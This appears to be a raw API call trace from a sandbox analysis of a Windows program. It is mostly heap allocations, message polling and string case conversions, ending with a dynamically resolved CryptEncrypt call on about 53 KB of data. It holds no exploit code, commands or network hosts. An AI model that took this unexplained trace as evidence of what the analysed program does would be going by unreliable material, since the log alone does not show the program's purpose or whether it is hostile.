[0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0111.875] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0111.876] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0111.876] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a747d8 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0111.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0111.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0111.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0111.877] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0111.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0111.877] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0111.877] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0111.878] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.878] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0111.878] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0111.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0111.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0111.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0111.879] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0111.879] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0111.879] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0111.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0111.880] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0111.880] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0111.880] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0111.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0111.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0111.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.884] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xcf42, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xcf48) returned 1 [0111.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.884] CharLowerBuffW (in: lpsz="byte[53064]", cchLength=0xb | out: lpsz="byte[53064]") returned 0xb [0111.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.886] 